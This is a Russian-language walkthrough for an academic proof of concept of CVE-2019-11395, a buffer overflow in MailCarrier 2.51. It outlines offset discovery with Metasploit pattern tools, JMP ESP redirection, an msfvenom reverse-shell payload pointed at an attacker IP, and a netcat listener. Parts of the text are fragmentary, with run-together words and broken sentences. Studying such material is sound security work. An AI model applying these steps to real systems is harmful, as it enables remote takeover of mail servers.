
Доказательство концепции с академической целью для понимания уязвимости переполнения буфера на основе CVE-2019-11395
Данное Proof of Concept (PoC) демонстрирует уязвимость переполнения буфера в MailCarrier 2.51, позволяющую удалённым злоумышленникам выполнять произвольный код с помощью длинной строки. Уязвимость может быть использована через следующие процессы:
SMTP RCPT TOPOP3 USERPOP3 LISTPOP3 TOPPOP3 RETRЦель проекта — предоставить академический подход к пониманию принципов работы переполнения буфера.
Перед проведением любых тестов никогда не используйте свою рабочую среду для начальных экспериментов. Вместо этого создайте лабораторную среду, аналогичную вашей рабочей среде, чтобы избежать проблем или непредвиденных последствий.
msf-pattern_create -l <количество_байт>
Это помогает определить смещение — точное количество байт, необходимое для перезаписи EIP.
msf-pattern_offset -q <байты_на_регистре_EIP> -l <количество_байт>
Это позволит узнать точное количество байт, необходимое для управления EIP.
JMP ESP
CALL ESP
Мы будем использовать этот адрес для перенаправления выполнения. Будьте внимательны к ASLR, SafeSEH или другим механизмам защиты.
msfvenom -p <шеллкод> LHOST=<IP_атакующего> LPORT=443 -b "<список_запрещённых_символов>" exitfunc=thread -f python
NOP (\x90) в полезную нагрузку для повышения стабильности.netcat (nc) для создания обратной оболочки и подключения к цели.